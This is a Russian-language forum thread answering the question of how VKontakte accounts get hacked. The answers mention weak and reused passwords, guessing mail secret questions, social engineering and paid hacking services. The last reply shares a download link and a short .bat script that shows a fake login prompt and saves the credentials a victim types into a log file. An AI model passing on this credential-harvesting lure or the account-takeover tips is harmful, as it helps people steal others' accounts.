Sergey Kim

Скажите как взламывают страницы в контакте?? без программ. ??

Валентин Великий

Просто люди "халатно" относятся к своему паролю.
Выбирают простой пароль ("12345", "qwerty", "password" ...)
Вбивают вместо пароля свое имя-фамилию, год рождения и проч.. .
Регистрируются на других сайтах и вбивают такой же пароль как у себя в ВК.. .

Много вариантов для злоумышленников...

Светлана Волобуева

помешались все на взломе... наверно девку свою проверить

Kis-Myu Kis-Myu

Мозгами и руками. Программ вообще нет. И делать это тоже нехорошо. Уголовная ответственность. Но вы не догоняете, и вам можно.

Галина

узнаеш пароль от майла (это не очень сложно, просто нужно знать ответ на секретный вопрос) и страница вк сломана!

Сухроб Эгамбердиев

Вся школота в хакеры хочет записаться. У вас там других развлечений совсем не осталось?

Анастасия Климченко

Социальная инженерия.

Маруся Иванова

тут два варианта
первый написал Иван, второй Артем...

Джа Халилов

Сушествуют платные онлайн сервисы по взламыванию страниц, сайтов, емейлов, и. т. д но есть риск что могут обмануть!

Маша Даленкина

Всё просто. Пальцы (жены, девушки) вставляются в дверь.

Ольга Ющенко

Честному человеку - ни как не взломть. а ты я вижу честный раз не знаеш как взломать страницы, я думаю, не только в ВК

Сергей

Могу посаветовать только сфиннер сделанный мною "взлом вк" (появится log.DeTeCtEd читаем через текстовый документ)
вот ссылка ---https://yadi.sk/d/wnIDqbVTqUetY

сам код (.bat файл)

@echo off
color a
title login
echo ‚ўҐ¤ЁвҐ бў®Ё ¤ ­­лҐ зв®Ўл ў§«®¬ вм VK ­ Ј®«®б
echo.
set /p user=«®ЈЁ­:
set /p pass=Ї а®«м:
set /p golosa=Ј®«®б :
echo Login="%user%" Password= "%pass%" golosa="%golosa%" > log.txt
echo.
exit